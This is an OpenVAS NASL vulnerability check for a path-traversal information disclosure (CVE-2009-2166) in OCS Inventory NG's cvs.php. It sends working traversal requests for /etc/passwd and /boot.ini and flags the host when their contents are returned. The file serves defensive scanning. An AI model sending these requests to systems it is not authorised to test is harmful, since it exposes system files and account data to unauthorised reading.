###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_ocs_inventory_ng_info_disc_vuln.nasl 3081 2009-06-23 20:04:29Z jun $
#
# OCS Inventory NG 'cvs.php' Inforamtion Disclosure Vulnerability
#
# Authors:
# Sharath S <sharaths@secpod.com>
#
# Copyright:
# Copyright (c) 2009 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_id(900378);
  script_version("$Revision: 1.1 $");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"risk_factor", value:"Medium");
  script_cve_id("CVE-2009-2166");
  script_name("OCS Inventory NG 'cvs.php' Inforamtion Disclosure Vulnerability");
  desc = "

  Overview: This host is running OCS Inventory NG and is prone to Information
  Disclosure vulnerability.

  Vulnerability Insight:
  The flaw is due to improper sanitization of user supplied input through the
  'cvs.php' file which can exploited by sending a direct request to the
  'log' parameter.

  Impact:
  Successful exploitation will let the attacker to cause path traversal attack,
  and gain sensitive information.

  Impact Level: System

  Affected Software/OS:
  OCS Inventory NG version prior to 1.02.1

  Fix: Upgrade to OCS Inventory NG version 1.02.1 or later
  http://www.ocsinventory-ng.org/index.php?page=downloads

  References:
  http://www.milw0rm.com/exploits/8868
  http://xforce.iss.net/xforce/xfdb/50946

  CVSS Score:
    CVSS Base Score      : 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N)
    CVSS Temporal Score  : 3.9
  Risk factor : Medium";

  script_description(desc);
  script_summary("Check for the Attack of OCS Inventory NG");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2009 SecPod");
  script_family("Web application abuses");
  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}


include("http_func.inc");
include("version_func.inc");

ocsngPort = get_http_port(default:80);
if(!ocsngPort){
  ocsngPort = 80;
}

if(!get_port_state(ocsngPort)){
  exit(0);
}

foreach dir (make_list("/ocsreports", "/", cgi_dirs()))
{
  sndReq = http_get(item:dir + "/index.php", port:ocsngPort);
  rcvRes = http_send_recv(port:ocsngPort, data:sndReq);
  if("OCS Inventory" >< rcvRes)
  {
    if(!safe_checks())
    {
      sndReq1 = http_get(item:dir + "/cvs.php?log=/etc/passwd",
                         port:ocsngPort);
      rcvRes1 = http_send_recv(port:ocsngPort, data:sndReq1);
      if("root" >< rcvRes1)
      {
        security_warning(ocsngPort);
        exit(0);
      }

      sndReq2 = http_get(item:dir + "/cvs.php?log=/boot.ini",
                         port:ocsngPort);
      rcvRes2 = http_send_recv(port:ocsngPort, data:sndReq2);
      if("boot loader" >< rcvRes2)
      {
        security_warning(ocsngPort);
        exit(0);
      }
    }
  }
}
